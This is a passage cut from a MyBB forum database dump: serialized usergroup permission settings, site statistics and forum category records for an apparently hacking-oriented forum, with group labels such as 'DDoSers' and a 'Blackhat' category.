";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:12;a:73:{s:3:\"gid\";s:2:\"12\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:6:\"Coders\";s:11:\"description\";s:134:\"This group is based on coding. Members in this group dedicate their time to code pages/programs and help others to learn how to code. \";s:9:\"namestyle\";s:43:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:22:\"images/stars/grey.png \";s:5:\"image\";s:20:\"images/ub/Coders.png\";s:9:\"disporder\";s:2:\"14\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:4:\"2880\";}i:13;a:73:{s:3:\"gid\";s:2:\"13\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:6:\"Unique\";s:11:\"description\";s:67:\"We are Unique. We are a HQ Group. And we have the best HQ members. \";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.png\";s:5:\"image\";s:21:\"/images/ub/unique.gif\";s:9:\"disporder\";s:2:\"15\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"1\";s:17:\"maxreputationsday\";s:1:\"2\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:14;a:73:{s:3:\"gid\";s:2:\"14\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:6:\"Closed\";s:11:\"description\";s:26:\"Permanently banned members\";s:9:\"namestyle\";s:52:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:2:\"11\";s:13:\"isbannedgroup\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"0\";s:15:\"maxpmrecipients\";s:1:\"0\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"0\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"0\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"0\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:15;a:73:{s:3:\"gid\";s:2:\"15\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:8:\"Underage\";s:11:\"description\";s:66:\"People under 14 with parent/legal guardian permission to access LH\";s:9:\"namestyle\";s:10:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:2:\"13\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:17;a:73:{s:3:\"gid\";s:2:\"17\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:6:\"Gamers\";s:11:\"description\";s:132:\"L33THackings Gamers group, We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.png\";s:5:\"image\";s:19:\"images/ub/gamer.png\";s:9:\"disporder\";s:2:\"16\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"1\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"5\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:20;a:73:{s:3:\"gid\";s:2:\"20\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:7:\"DDoSers\";s:11:\"description\";s:42:\"A group for people who like DDoSing sites.\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:6:\"DDoSER\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.png\";s:5:\"image\";s:21:\"images/ub/ddosers.gif\";s:9:\"disporder\";s:2:\"18\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:21;a:73:{s:3:\"gid\";s:2:\"21\";s:4:\"type\";s:1:\"4\";s:5:\"title\";s:13:\"The Marketers\";s:11:\"description\";s:193:\"We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too.\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/grey.gif\";s:5:\"image\";s:23:\"images/ub/marketers.gif\";s:9:\"disporder\";s:2:\"18\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}}'); INSERT INTO mybb_datacache VALUES('stats', 'a:7:{s:10:\"numthreads\";i:1229;s:20:\"numunapprovedthreads\";i:0;s:8:\"numposts\";i:7339;s:18:\"numunapprovedposts\";i:0;s:8:\"numusers\";i:253;s:7:\"lastuid\";s:3:\"345\";s:12:\"lastusername\";s:10:\"ZetaHunter\";}'); INSERT INTO mybb_datacache VALUES('forums', 'a:80:{i:1;a:37:{s:3:\"fid\";s:1:\"1\";s:4:\"name\";s:7:\"General\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:1:\"1\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:6;a:37:{s:3:\"fid\";s:1:\"6\";s:4:\"name\";s:14:\"Miscellaneous \";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:1:\"6\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:10;a:37:{s:3:\"fid\";s:2:\"10\";s:4:\"name\";s:8:\"Blackhat\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"10\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:51;a:37:{s:3:\"fid\";s:2:\"51\";s:4:\"name\";s:6:\"Coding\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"51\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmyco